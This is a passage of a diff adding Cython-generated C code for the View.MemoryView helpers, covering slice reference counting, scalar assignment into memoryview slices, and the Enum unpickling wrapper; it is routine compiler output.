__Pyx_RefNannyFinishContext(); + #ifdef WITH_THREAD + __Pyx_PyGILState_Release(__pyx_gilstate_save); + #endif +} + +/* "View.MemoryView":1371 + * + * @cname('__pyx_memoryview_refcount_objects_in_slice') + * cdef void refcount_objects_in_slice(char *data, Py_ssize_t *shape, # <<<<<<<<<<<<<< + * Py_ssize_t *strides, int ndim, bint inc) noexcept: + * cdef Py_ssize_t i + */ + +static void __pyx_memoryview_refcount_objects_in_slice(char *__pyx_v_data, Py_ssize_t *__pyx_v_shape, Py_ssize_t *__pyx_v_strides, int __pyx_v_ndim, int __pyx_v_inc) { + CYTHON_UNUSED Py_ssize_t __pyx_v_i; + Py_ssize_t __pyx_v_stride; + __Pyx_RefNannyDeclarations + Py_ssize_t __pyx_t_1; + Py_ssize_t __pyx_t_2; + Py_ssize_t __pyx_t_3; + int __pyx_t_4; + __Pyx_RefNannySetupContext("refcount_objects_in_slice", 0); + + /* "View.MemoryView":1374 + * Py_ssize_t *strides, int ndim, bint inc) noexcept: + * cdef Py_ssize_t i + * cdef Py_ssize_t stride = strides[0] # <<<<<<<<<<<<<< + * + * for i in range(shape[0]): + */ + __pyx_v_stride = (__pyx_v_strides[0]); + + /* "View.MemoryView":1376 + * cdef Py_ssize_t stride = strides[0] + * + * for i in range(shape[0]): # <<<<<<<<<<<<<< + * if ndim == 1: + * if inc: + */ + __pyx_t_1 = (__pyx_v_shape[0]); + __pyx_t_2 = __pyx_t_1; + for (__pyx_t_3 = 0; __pyx_t_3 < __pyx_t_2; __pyx_t_3+=1) { + __pyx_v_i = __pyx_t_3; + + /* "View.MemoryView":1377 + * + * for i in range(shape[0]): + * if ndim == 1: # <<<<<<<<<<<<<< + * if inc: + * Py_INCREF(( data)[0]) + */ + __pyx_t_4 = (__pyx_v_ndim == 1); + if (__pyx_t_4) { + + /* "View.MemoryView":1378 + * for i in range(shape[0]): + * if ndim == 1: + * if inc: # <<<<<<<<<<<<<< + * Py_INCREF(( data)[0]) + * else: + */ + if (__pyx_v_inc) { + + /* "View.MemoryView":1379 + * if ndim == 1: + * if inc: + * Py_INCREF(( data)[0]) # <<<<<<<<<<<<<< + * else: + * Py_DECREF(( data)[0]) + */ + Py_INCREF((((PyObject **)__pyx_v_data)[0])); + + /* "View.MemoryView":1378 + * for i in range(shape[0]): + * if ndim == 1: + * if inc: # <<<<<<<<<<<<<< + * Py_INCREF(( data)[0]) + * else: + */ + goto __pyx_L6; + } + + /* "View.MemoryView":1381 + * Py_INCREF(( data)[0]) + * else: + * Py_DECREF(( data)[0]) # <<<<<<<<<<<<<< + * else: + * refcount_objects_in_slice(data, shape + 1, strides + 1, ndim - 1, inc) + */ + /*else*/ { + Py_DECREF((((PyObject **)__pyx_v_data)[0])); + } + __pyx_L6:; + + /* "View.MemoryView":1377 + * + * for i in range(shape[0]): + * if ndim == 1: # <<<<<<<<<<<<<< + * if inc: + * Py_INCREF(( data)[0]) + */ + goto __pyx_L5; + } + + /* "View.MemoryView":1383 + * Py_DECREF(( data)[0]) + * else: + * refcount_objects_in_slice(data, shape + 1, strides + 1, ndim - 1, inc) # <<<<<<<<<<<<<< + * + * data += stride + */ + /*else*/ { + __pyx_memoryview_refcount_objects_in_slice(__pyx_v_data, (__pyx_v_shape + 1), (__pyx_v_strides + 1), (__pyx_v_ndim - 1), __pyx_v_inc); + } + __pyx_L5:; + + /* "View.MemoryView":1385 + * refcount_objects_in_slice(data, shape + 1, strides + 1, ndim - 1, inc) + * + * data += stride # <<<<<<<<<<<<<< + * + * + */ + __pyx_v_data = (__pyx_v_data + __pyx_v_stride); + } + + /* "View.MemoryView":1371 + * + * @cname('__pyx_memoryview_refcount_objects_in_slice') + * cdef void refcount_objects_in_slice(char *data, Py_ssize_t *shape, # <<<<<<<<<<<<<< + * Py_ssize_t *strides, int ndim, bint inc) noexcept: + * cdef Py_ssize_t i + */ + + /* function exit code */ + __Pyx_RefNannyFinishContext(); +} + +/* "View.MemoryView":1391 + * + * @cname('__pyx_memoryview_slice_assign_scalar') + * cdef void slice_assign_scalar(__Pyx_memviewslice *dst, int ndim, # <<<<<<<<<<<<<< + * size_t itemsize, void *item, + * bint dtype_is_object) noexcept nogil: + */ + +static void __pyx_memoryview_slice_assign_scalar(__Pyx_memviewslice *__pyx_v_dst, int __pyx_v_ndim, size_t __pyx_v_itemsize, void *__pyx_v_item, int __pyx_v_dtype_is_object) { + + /* "View.MemoryView":1394 + * size_t itemsize, void *item, + * bint dtype_is_object) noexcept nogil: + * refcount_copying(dst, dtype_is_object, ndim, inc=False) # <<<<<<<<<<<<<< + * _slice_assign_scalar(dst.data, dst.shape, dst.strides, ndim, itemsize, item) + * refcount_copying(dst, dtype_is_object, ndim, inc=True) + */ + __pyx_memoryview_refcount_copying(__pyx_v_dst, __pyx_v_dtype_is_object, __pyx_v_ndim, 0); + + /* "View.MemoryView":1395 + * bint dtype_is_object) noexcept nogil: + * refcount_copying(dst, dtype_is_object, ndim, inc=False) + * _slice_assign_scalar(dst.data, dst.shape, dst.strides, ndim, itemsize, item) # <<<<<<<<<<<<<< + * refcount_copying(dst, dtype_is_object, ndim, inc=True) + * + */ + __pyx_memoryview__slice_assign_scalar(__pyx_v_dst->data, __pyx_v_dst->shape, __pyx_v_dst->strides, __pyx_v_ndim, __pyx_v_itemsize, __pyx_v_item); + + /* "View.MemoryView":1396 + * refcount_copying(dst, dtype_is_object, ndim, inc=False) + * _slice_assign_scalar(dst.data, dst.shape, dst.strides, ndim, itemsize, item) + * refcount_copying(dst, dtype_is_object, ndim, inc=True) # <<<<<<<<<<<<<< + * + * + */ + __pyx_memoryview_refcount_copying(__pyx_v_dst, __pyx_v_dtype_is_object, __pyx_v_ndim, 1); + + /* "View.MemoryView":1391 + * + * @cname('__pyx_memoryview_slice_assign_scalar') + * cdef void slice_assign_scalar(__Pyx_memviewslice *dst, int ndim, # <<<<<<<<<<<<<< + * size_t itemsize, void *item, + * bint dtype_is_object) noexcept nogil: + */ + + /* function exit code */ +} + +/* "View.MemoryView":1400 + * + * @cname('__pyx_memoryview__slice_assign_scalar') + * cdef void _slice_assign_scalar(char *data, Py_ssize_t *shape, # <<<<<<<<<<<<<< + * Py_ssize_t *strides, int ndim, + * size_t itemsize, void *item) noexcept nogil: + */ + +static void __pyx_memoryview__slice_assign_scalar(char *__pyx_v_data, Py_ssize_t *__pyx_v_shape, Py_ssize_t *__pyx_v_strides, int __pyx_v_ndim, size_t __pyx_v_itemsize, void *__pyx_v_item) { + CYTHON_UNUSED Py_ssize_t __pyx_v_i; + Py_ssize_t __pyx_v_stride; + Py_ssize_t __pyx_v_extent; + int __pyx_t_1; + Py_ssize_t __pyx_t_2; + Py_ssize_t __pyx_t_3; + Py_ssize_t __pyx_t_4; + + /* "View.MemoryView":1404 + * size_t itemsize, void *item) noexcept nogil: + * cdef Py_ssize_t i + * cdef Py_ssize_t stride = strides[0] # <<<<<<<<<<<<<< + * cdef Py_ssize_t extent = shape[0] + * + */ + __pyx_v_stride = (__pyx_v_strides[0]); + + /* "View.MemoryView":1405 + * cdef Py_ssize_t i + * cdef Py_ssize_t stride = strides[0] + * cdef Py_ssize_t extent = shape[0] # <<<<<<<<<<<<<< + * + * if ndim == 1: + */ + __pyx_v_extent = (__pyx_v_shape[0]); + + /* "View.MemoryView":1407 + * cdef Py_ssize_t extent = shape[0] + * + * if ndim == 1: # <<<<<<<<<<<<<< + * for i in range(extent): + * memcpy(data, item, itemsize) + */ + __pyx_t_1 = (__pyx_v_ndim == 1); + if (__pyx_t_1) { + + /* "View.MemoryView":1408 + * + * if ndim == 1: + * for i in range(extent): # <<<<<<<<<<<<<< + * memcpy(data, item, itemsize) + * data += stride + */ + __pyx_t_2 = __pyx_v_extent; + __pyx_t_3 = __pyx_t_2; + for (__pyx_t_4 = 0; __pyx_t_4 < __pyx_t_3; __pyx_t_4+=1) { + __pyx_v_i = __pyx_t_4; + + /* "View.MemoryView":1409 + * if ndim == 1: + * for i in range(extent): + * memcpy(data, item, itemsize) # <<<<<<<<<<<<<< + * data += stride + * else: + */ + (void)(memcpy(__pyx_v_data, __pyx_v_item, __pyx_v_itemsize)); + + /* "View.MemoryView":1410 + * for i in range(extent): + * memcpy(data, item, itemsize) + * data += stride # <<<<<<<<<<<<<< + * else: + * for i in range(extent): + */ + __pyx_v_data = (__pyx_v_data + __pyx_v_stride); + } + + /* "View.MemoryView":1407 + * cdef Py_ssize_t extent = shape[0] + * + * if ndim == 1: # <<<<<<<<<<<<<< + * for i in range(extent): + * memcpy(data, item, itemsize) + */ + goto __pyx_L3; + } + + /* "View.MemoryView":1412 + * data += stride + * else: + * for i in range(extent): # <<<<<<<<<<<<<< + * _slice_assign_scalar(data, shape + 1, strides + 1, ndim - 1, itemsize, item) + * data += stride + */ + /*else*/ { + __pyx_t_2 = __pyx_v_extent; + __pyx_t_3 = __pyx_t_2; + for (__pyx_t_4 = 0; __pyx_t_4 < __pyx_t_3; __pyx_t_4+=1) { + __pyx_v_i = __pyx_t_4; + + /* "View.MemoryView":1413 + * else: + * for i in range(extent): + * _slice_assign_scalar(data, shape + 1, strides + 1, ndim - 1, itemsize, item) # <<<<<<<<<<<<<< + * data += stride + * + */ + __pyx_memoryview__slice_assign_scalar(__pyx_v_data, (__pyx_v_shape + 1), (__pyx_v_strides + 1), (__pyx_v_ndim - 1), __pyx_v_itemsize, __pyx_v_item); + + /* "View.MemoryView":1414 + * for i in range(extent): + * _slice_assign_scalar(data, shape + 1, strides + 1, ndim - 1, itemsize, item) + * data += stride # <<<<<<<<<<<<<< + * + * + */ + __pyx_v_data = (__pyx_v_data + __pyx_v_stride); + } + } + __pyx_L3:; + + /* "View.MemoryView":1400 + * + * @cname('__pyx_memoryview__slice_assign_scalar') + * cdef void _slice_assign_scalar(char *data, Py_ssize_t *shape, # <<<<<<<<<<<<<< + * Py_ssize_t *strides, int ndim, + * size_t itemsize, void *item) noexcept nogil: + */ + + /* function exit code */ +} + +/* "(tree fragment)":1 + * def __pyx_unpickle_Enum(__pyx_type, long __pyx_checksum, __pyx_state): # <<<<<<<<<<<<<< + * cdef object __pyx_PickleError + * cdef object __pyx_result + */ + +/* Python wrapper */ +static PyObject *__pyx_pw_15View_dot_MemoryView_1__pyx_unpickle_Enum(PyObject *__pyx_self, +#if CYTHON_METH_FASTCALL +PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds +#else +PyObject *__pyx_args, PyObject *__pyx_kwds +#endif +); /*proto*/ +static PyMethodDef __pyx_mdef_15View_dot_MemoryView_1__pyx_unpickle_Enum = {"__pyx_unpickle_Enum", (PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_pw_15View_dot_MemoryView_1__pyx_unpickle_Enum, __Pyx_METH_FASTCALL|METH_KEYWORDS, 0}; +static PyObject *__pyx_pw_15View_dot_MemoryView_1__pyx_unpickle_Enum(PyObject *__pyx_self, +#if CYTHON_METH_FASTCALL +PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds +#else +PyObject *__pyx_args, PyObject *__pyx_kwds +#endif +) { + PyObject *__pyx_v___pyx_type = 0; + long __pyx_v___pyx_checksum; + PyObject *__pyx_v___pyx_state = 0; + #if !CYTHON_METH_FASTCALL + CYTHON_UNUSED const Py_ssize_t __pyx_nargs = PyTuple_GET_SIZE(__pyx_args); + #endif + CYTHON_UNUSED PyObject *const *__pyx_kwvalues = __Pyx_KwValues_FASTCALL(__pyx_args, __pyx_nargs); + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + PyObject *__pyx_r = 0; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("__pyx_unpickle_Enum (wrapper)", 0); + { + PyObject **__pyx_pyargnames[] = {&__pyx_n_s_pyx_type,&__pyx_n_s_pyx_checksum,&__pyx_n_s_pyx_state,0}; + PyObject* values[3] = {0,0,0}; + if (__pyx_kwds) { + Py_ssize_t kw_args; + switch (__pyx_nargs) { + case 3: values[2] = __Pyx_Arg_FASTCALL(__pyx_args, 2); + CYTHON_FALLTHROUGH; + case 2: values[1] = __Pyx_Arg_FASTCALL(__pyx_args, 1); + CYTHON_FALLTHROUGH; + case 1: values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); + CYTHON_FALLTHROUGH; + case 0: break; + default: goto __pyx_L5_argtuple_error; + } + kw_args = __Pyx_NumKwargs_FASTCALL(__pyx_kwds); + switch (__pyx_nargs) { + case 0: + if (likely((values[0] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_pyx_type)) != 0)) kw_args--; + else if (unlikely(PyErr_Occurred())) __PYX_ERR(1, 1, __pyx_L3_error) + else goto __pyx_L5_argtuple_error; + CYTHON_FALLTHROUGH; + case 1: + if (likely((values[1] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_pyx_checksum)) != 0)) kw_args--; + else if (unlikely(PyErr_Occurred())) __PYX_ERR(1, 1, __pyx_L3_error) + else { + __Pyx_RaiseArgtupleInvalid("__pyx_unpickle_Enum", 1, 3, 3, 1); __PYX_ERR(1, 1, __pyx_L3_error) + } + CYTHON_FALLTHROUGH; + case 2: + if (likely((values[2] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_pyx_state)) != 0)) kw_args--; + else if (unlikely(PyErr_Occurred())) __PYX_ERR(1, 1, __pyx_L3_error) + else { + __Pyx_RaiseArgtupleInvalid("__pyx_unpickle_Enum", 1, 3, 3, 2); __PYX_ERR(1, 1, __pyx_L3_error) + } + } + if (unlikely(kw_args > 0)) { + const Py_ssize_t kwd_pos_args = __pyx_nargs; + if (unlikely(__Pyx_ParseOptionalKeywords(__pyx_kwds, __pyx_kwvalues, __pyx_pyargnames, 0, values + 0, kwd_pos_args, "__pyx_unpickle_Enum") < 0)) __PYX_ERR(1, 1, __pyx_L3_error) + } + } else if (unlikely(__pyx_nargs != 3)) { + goto __pyx_L5_argtuple_error; + } else { + values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); + values[1] = __Pyx_Arg_FASTCALL(__pyx_args, 1); + values[2] = __Pyx_Arg_FASTCALL(__pyx_args, 2); + } + __pyx_v___pyx_type = values[0]; + __pyx_v___pyx_checksum = __Pyx_PyInt_As_long(values[1]); if (unlikely((__pyx_v___pyx_checksum == (long)-1) && PyErr_Occurred())) __PYX_ERR(1, 1, __pyx_L3_error) + __pyx_v___pyx_state = values[2]; + } + goto __pyx_L4_argument_unpacking_done; + __pyx_L5_argtuple_error:; + __Pyx_RaiseArgtupleInvalid("__pyx_unpickle_Enum", 1, 3, 3, __pyx_nargs); __PYX_ERR(1, 1, __pyx_L3_error) + __pyx_L3_error:; + __Pyx_AddTraceback("View.MemoryView.__pyx_unpickle_Enum", __pyx_clineno, __pyx_lineno, __pyx_filename); + __Pyx_RefNannyFinishContext(); + return NULL; + __pyx_L4_argument_unpacking_done:; + __pyx_r = __pyx_pf_15View_dot_MemoryView___pyx_unpickle_Enum(__pyx_self, __pyx_v___pyx_type, __pyx_v___pyx_checksum, __pyx_v___pyx_state); + + /* function exit code */ + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +static PyObject *__pyx_pf_15View_dot_MemoryView___pyx_unpickle_Enum(CYTHON_UNUSED PyObject *__pyx_self, PyObject *__pyx_v___pyx_type, long __pyx_v___pyx_checksum, PyObject *__pyx_v___pyx_state) { + PyObject *__pyx_v___pyx_PickleError = 0; + PyObject *__pyx_v___pyx_result = 0; + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + PyObject *__pyx_t_1 = NULL; + int __pyx_t_2; + PyObject *__pyx_t_3 = NULL; + PyObject *__pyx_t_4 = NULL; + int __pyx_t_5; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("__pyx_unpickle_Enum", 0); + + /* "(tree fragment)":4 + * cdef object __pyx_PickleError + * cdef object __pyx_result + * if __pyx_checksum not in (0x82a3537, 0x6ae9995, 0xb068931): # <<<<<<<<<<<<<< + * from pickle import PickleError as __pyx_PickleError + * raise __pyx_PickleError, "Incompatible checksums (0x%x vs (0x82a3537, 0x6ae9995, 0xb068931) = (name))" % __pyx_checksum + */ + __pyx_t_1 = __Pyx_PyInt_From_long(__pyx_v___pyx_checksum); if (unlikely(!__pyx_t_1)) __PYX_ERR(1, 4, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_t_2 = (__Pyx_PySequence_ContainsTF(__pyx_t_1, __pyx_tuple__10, Py_NE)); if (unlikely((__pyx_t_2 < 0))) __PYX_ERR(1, 4, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; + if (__pyx_t_2) { + + /* "(tree fragment)":5 + * cdef object __pyx_result + * if __pyx_checksum not in (0x82a3537, 0x6ae9995, 0xb068931): + * from pickle import PickleError as __pyx_PickleError # <<<<<<<<<<<<<< + * raise __pyx_PickleError, "Incompatible checksums (0x%x vs (0x82a3537, 0x6ae9995, 0xb068931) = (name))" % __pyx_checksum + * __pyx_result = Enum.__new__(__pyx_type) + */ + __pyx_t_1 = PyList_New(1); if (unlikely(!__pyx_t_1)) __PYX_ERR(1, 5, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __Pyx_INCREF(__pyx_n_s_PickleError); + __Pyx_GIVEREF(__pyx_n_s_PickleError); + PyList_SET_ITEM(__pyx_t_1, 0, __pyx_n_s_PickleError); + __pyx_t_3 = __Pyx_Import(__pyx_n_s_pickle, __pyx_t_1, 0); if (unlikely(!__pyx_t_3)) __PYX_ERR(1, 5, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_3); + __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; + __pyx_t_1 = __Pyx_ImportFrom(__pyx_t_3, __pyx_n_s_PickleError); if (unlikely(!__pyx_t_1)) __PYX_ERR(1, 5, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __Pyx_INCREF(__pyx_t_1); + __pyx_v___pyx_PickleError = __pyx_t_1; + __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; + __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; + + /* "(tree fragment)":6 + * if __pyx_checksum not in (0x82a3537, 0x6ae9995, 0xb068931): + * from pickle import PickleError as __pyx_PickleError + * raise __pyx_PickleError, "Incompatible checksums (0x%x vs (0x82a3537, 0x6ae9995, 0xb068931) = (name))" % __pyx_checksum # <<<<<<<<<<<<<< + * __pyx_result = Enum.__new__(__pyx_type) + * if __pyx_state is not None: + */ + __pyx_t_3 = __Pyx_PyInt_From_long(__pyx_v___pyx_checksum); if (unlikely(!__pyx_t_3)) __PYX_ERR(1, 6, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_3); + __pyx_t_1 = __Pyx_PyString_Format(__pyx_kp_s_Incompatible_checksums_0x_x_vs_0_2, __pyx_t_3); if (unlikely(!__pyx_t_1)) __PYX_ERR(1, 6, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; + __Pyx_Raise(__pyx_v___pyx_PickleError, __pyx_t_1, 0, 0); + __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; + __PYX_ERR(1, 6, __pyx_L1_error) + + /* "(tree fragment)":4 + * cdef object __pyx_PickleError + * cdef object __pyx_result + * if __pyx_checksum not in (0x82a3537, 0x6ae9995, 0xb068931): # <<<<<<<<<<<<<< + * from pickle import PickleError as __pyx_PickleError + * raise __pyx_PickleError, "Incompatible checksums (0x%x vs (0x82a3537, 0x6ae9995, 0xb068931) = (name))" % __pyx_checksum + */ + } + + /* "(tree fragment)":7 + * from pickle import PickleError as __pyx_PickleError + * raise __pyx_PickleError, "Incompatible checksums (0x%x vs (0x82a3537, 0x6ae9995, 0xb068931) = (name))" % __pyx_checksum + * __pyx_result = Enum.__new__(__pyx_type) # <<<<<<<<<<<<<< + * if __pyx_state is not None: + * __pyx_unpickle_Enum__set_state( __pyx_result, __pyx_state) + */ + __pyx_t_3 = __Pyx_PyObject_GetAttrStr(((PyObject *)__pyx_MemviewEnum_type), __pyx_n_s_new); if (unlikely(!__pyx_t_3)) __PYX_ERR(1, 7, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_3); + __pyx_t_4 = NULL; + __pyx_t_5 = 0; + if (CYTHON_UNPACK_METHODS && likely(PyMethod_Check(__pyx_t_3))) { + __pyx_t_4 = PyMethod_GET_SELF(__pyx_t_3); + if (likely(__pyx_t_4)) { + PyObject* function = PyMethod_GET_FUNCTION(__pyx_t_3); + __Pyx_INCREF(__pyx_t_4); + __Pyx_INCREF(function); + __Pyx_DECREF_SET(__pyx_t_3, function); + __pyx_t_5 = 1; + } + } + { + PyObject *__pyx_callargs[2] = {__pyx_t_4, __pyx_v___pyx_type}; + __pyx_t_1 = __Pyx_PyObject_FastCall(__pyx_t_3, __pyx_callargs+1-__pyx_t_5, 1+__pyx_t_5); + __Pyx_XDECREF(__pyx_t_4); __pyx_t_4 = 0; + if (unlikely(!__pyx_t_1)) __PYX_ERR(1, 7, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; + } + __pyx_v___pyx_result = __pyx_t_1; + __pyx_t_1 = 0; + + /* "(tree fragment)":8 + * raise __pyx_PickleError, "Incompatible checksums (0x%x vs (0x82a3537, 0x6ae9995, 0xb068931) = (name))" % __pyx_checksum + * __pyx_result = Enum.__new__(__pyx_type) + * if __pyx_state is not None: # <<<<<<<<<<<<<< + * __pyx_unpickle_Enum__set_state( __pyx_result, __pyx_state) + * return __pyx_result + */ + __pyx_t_2 = (__pyx_v___pyx_state != Py_None); + if (__pyx_t_2) { + + /* "(tree fragment)":9 + * __pyx_result = Enum.__new__(__pyx_type) + * if __pyx_state is not None: + * __pyx_unpickle_Enum__set_state( __pyx_result, __pyx_state) # <<<<<<<<<<<<<< + * return __pyx_result + * cdef __pyx_unpickle_Enum__set_state(Enum __pyx_result, tuple __pyx_state): + */ + if (!(likely(PyTuple_CheckExact(__pyx_v___pyx_state))||((__pyx_v___pyx_state) == Py_None) || __Pyx_RaiseUnexpectedTypeError("tuple", __pyx_v___pyx_state))) __PYX_ERR(1, 9, __pyx_L1_error) + __pyx_t_1 = __pyx_unpickle_Enum__set_state(((struct __pyx_MemviewEnum_obj *)__pyx_v___pyx_result), ((PyObject*)__pyx_v___pyx_state)); if (unlikely(!__pyx_t_1)) __PYX_ERR(1, 9, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; + + /* "(tree fragment)":8 + * raise __pyx_PickleError, "Incompatible checksums (0x%x vs (0x82a3537, 0x6ae9995, 0xb068931) = (name))" % __pyx_checksum + * __pyx_result = Enum.__new__(__pyx_type) + * if __pyx_state is not None: # <<<<<<<<<<<<<< + * __pyx_unpickle_Enum__set_state( __pyx_result, __pyx_state) + * return __pyx_result + */ + } + + /* "(tree fragment)":10 + * if __pyx_state is not None: + * __pyx_unpickle_Enum__set_state( __pyx_result, __pyx_state) + * return __pyx_result # <<<<<<<<<<<<<< + * cdef __pyx_unpickle_Enum__set_state(Enum __pyx_result, tuple __pyx_state): + * __pyx_result.name = __pyx_state[0] + */ + __Pyx_XDECREF(__pyx_r); + __Pyx_INCREF(__pyx_v___pyx_result); + __pyx_r = __pyx_v___pyx_result; + goto __pyx_L0; + + /* "(tree fragment)":1 + * def __pyx_unpickle_Enum(__pyx_type, long __pyx_checksum, __pyx_state): # <<<<<<<<<<<<<< + * cdef object __pyx_PickleError + * cdef object __pyx_result + */ + + /* function exit code */ + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_1); + __Pyx_XDECREF(__pyx_t_3); + __Pyx_XDECREF(__pyx_t_4); + __Pyx_AddTraceback("View.MemoryView.__pyx_unpickle_Enum", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = NULL; + __pyx_L0:; + __Pyx_XDECREF(__pyx_v___pyx_PickleError); + __Pyx_XDECREF(__pyx_v___pyx_result); + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "(tree fragment)":11 + * __pyx_unpickle_Enum__set_state( __pyx_result, __pyx_state) + * return __pyx_result + * cdef __pyx_unpickle_Enum__set_state(Enum __pyx_result, tuple __pyx_state): # <<<<<<<<<<<<<< + * __pyx_result.name = __pyx_state[0] + * if len(__pyx_state) > 1 and hasattr(__pyx_result, '__dict__'): + */ + +static PyObject *__pyx_unpickle_Enum__set_state(struct __pyx_MemviewEnum_obj *__pyx_v___pyx_result, PyObject *__pyx_v___pyx_state) { + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + PyObject *__pyx_t_1 = NULL; + int __pyx_t_2; + Py_ssize_t __pyx_t_3; + int __pyx_t_4; + PyObject *__pyx_t_5 = NULL; + PyObject *__pyx_t_6 = NULL; + PyObject *__pyx_t_7 = NULL; + int __pyx_t_8; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("__pyx_unpickle_Enum__set_state", 0); + + /* "(tree fragment)":12 + * return __pyx_result + * cdef __pyx_unpickle_Enum__set_state(Enum __pyx_result, tuple __pyx_state): + * __pyx_result.name = __pyx_state[0] # <<<<<<<<<<<<<< + * if len(__pyx_state) > 1 and hasattr(__pyx_result, '__dict__'): + * __pyx_result.__dict__.update(__pyx_state[1]) + */ + if (unlikely(__pyx_v___pyx_state == Py_None)) { + PyErr_SetString(PyExc_TypeError, "'NoneType' object is not subscriptable"); + __PYX_ERR(1, 12, __pyx_L1_error) + } + __pyx_t_1 = __Pyx_GetItemInt_Tuple(__pyx_v___pyx_state, 0, long, 1, __Pyx_PyInt_From_long, 0, 0, 1); if (unlikely(!__pyx_t_1)) __PYX_ERR(1, 12, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __Pyx_GIVEREF(__pyx_t_1); + __Pyx_GOTREF(__pyx_v___pyx_result->name); + __Pyx_DECREF(__pyx_v___pyx_result->name); + __pyx_v___pyx_result->name = __pyx_t_1; + __pyx_t_1 = 0; + + /* "(tree fragment)":13 + * cdef __pyx_unpickle_Enum__set_state(Enum __pyx_result, tuple __pyx_state): + * __pyx_result.name = __pyx_state[0] + * if len(__pyx_state) > 1 and hasattr(__pyx_result, '__dict__'): # <<<<<<<<<<<<<< + * __pyx_result.__dict__.update(__pyx_state[1]) + */ + if (unlikely(__pyx_v___pyx_state == Py_None)) { + PyErr_SetString(PyExc_TypeError, "object of type 'NoneType' has no len()"); + __PYX_ERR(1, 13, __pyx_L1_error) + } + __pyx_t_3 = PyTuple_GET_SIZE(__pyx_v___pyx_state); if (unlikely(__pyx_t_3 == ((Py_ssize_t)-1))) __PYX_ERR(1, 13, __pyx_L1_error) + __pyx_t_4 = (__pyx_t_3 > 1); + if (__pyx_t_4) { + } else { + __pyx_t_2 = __pyx_t_4; + goto __pyx_L4_bool_binop_done; + } + __pyx_t_4 = __Pyx_HasAttr(((PyObject *)__pyx_v___pyx_result), __pyx_n_s_dict); if (unlikely(__pyx_t_4 == ((int)-1))) __PYX_ERR(1, 13, __pyx_L1_error) + __pyx_t_2 = __pyx_t_4; + __pyx_L4_bool_binop_done:; + if (__pyx_t_2) { + + /* "(tree fragment)":14 + * __pyx_result.name = __pyx_state[0] + * if len(__pyx_state) > 1 and hasattr(__pyx_result, '__dict__'): + * __pyx_result.__dict__.update(__pyx_state[1]) # <<<<<<<<<<<<<< + */ + __pyx_t_5 = __Pyx_PyObject_GetAttrStr(((PyObject *)__pyx_v___pyx_result), __pyx_n_s_dict); if (unlikely(!__pyx_t_5)) __PYX_ERR(1, 14, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_5); + __pyx_t_6 = __Pyx_PyObject_GetAttrStr(__pyx_t_5, __pyx_n_s_update); if (unlikely(!__pyx_t_6)) __PYX_ERR(1, 14, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_6); + __Pyx_DECREF(__pyx_t_5); __pyx_t_5 = 0; + if (unlikely(__pyx_v___pyx_state == Py_None)) { + PyErr_SetString(PyExc_TypeError, "'NoneType' object is not subscriptable"); + __PYX_ERR(1, 14, __pyx_L1_error) + } + __pyx_t_5 = __Pyx_GetItemInt_Tuple(__pyx_v___pyx_state, 1, long, 1, __Pyx_PyInt_From_long, 0, 0, 1); if (unlikely(!__pyx_t_5)) __PYX_ERR(1, 14, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_5); + __pyx_t_7 = NULL; + __pyx_t_8 = 0; + if (CYTHON_UNPACK_METHODS && likely(PyMethod_Check(__pyx_t_6))) { + __pyx_t_7 = PyMethod_GET_SELF(__pyx_t_6); + if (likely(__pyx_t_7)) { + PyObject* function = PyMethod_GET_FUNCTION(__pyx_t_6); + __Pyx_INCREF(__pyx_t_7); + __Pyx_INCREF(function); + __Pyx_DECREF_SET(__pyx_t_6, function); + __pyx_t_8 = 1; + } + } + { + PyObject *__pyx_callargs[2] = {__pyx_t_7, __pyx_t_5}; + __pyx_t_1 = __Pyx_PyObject_FastCall(__pyx_t_6, __pyx_callargs+1-__pyx_t_8, 1+__pyx_t_8); + __Pyx_XDECREF(__pyx_t_7); __pyx_t_7 = 0; + __Pyx_DECREF(__pyx_t_5); __pyx_t_5 = 0; + if (unlikely(!__pyx_t_1)) __PYX_ERR(1, 14, __pyx_L1_error) + 